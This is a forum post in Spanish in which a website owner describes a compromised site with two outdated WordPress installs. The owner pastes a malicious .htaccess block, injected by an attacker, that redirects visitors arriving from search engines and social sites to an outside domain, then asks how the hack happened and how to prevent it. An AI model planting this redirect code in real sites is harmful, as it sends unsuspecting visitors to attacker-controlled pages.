Mi sitio web fue prohibido como un sitio web de malware por Google. Cuando verifiqué el código, descubrí que un código inyectaba muchos archivos en mi servidor. Limpié todo manualmente, edité todos los archivos en mi servidor (alojamiento compartido) buscando algún código del código inyectado en todos los archivos. Incluso el archivo .htaccess fue modificado por el atacante.
Había dos instalaciones de WordPress en el sitio web, en dos subcarpetas diferentes de la raíz del sitio web, que no se actualizaron. He actualizado ambos.
Luego Google eliminó la prohibición en mi sitio web.
Ayer, descubrí que el atacante modificó de nuevo el archivo .htaccess de mi sitio web. Aquí está el código:
#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#
Busqué "b58b6f" en todos los archivos, pero no encuentro ninguno. Creo que este es el único archivo modificado por el ataque más reciente. He eliminado este archivo .htaccess, ya que no lo necesito.
¿Cómo pudo el hacker hackear mi sitio web? ¿Cómo evitar que esto vuelva a suceder? ¿Cómo puedo hacer que mi sitio web sea más seguro?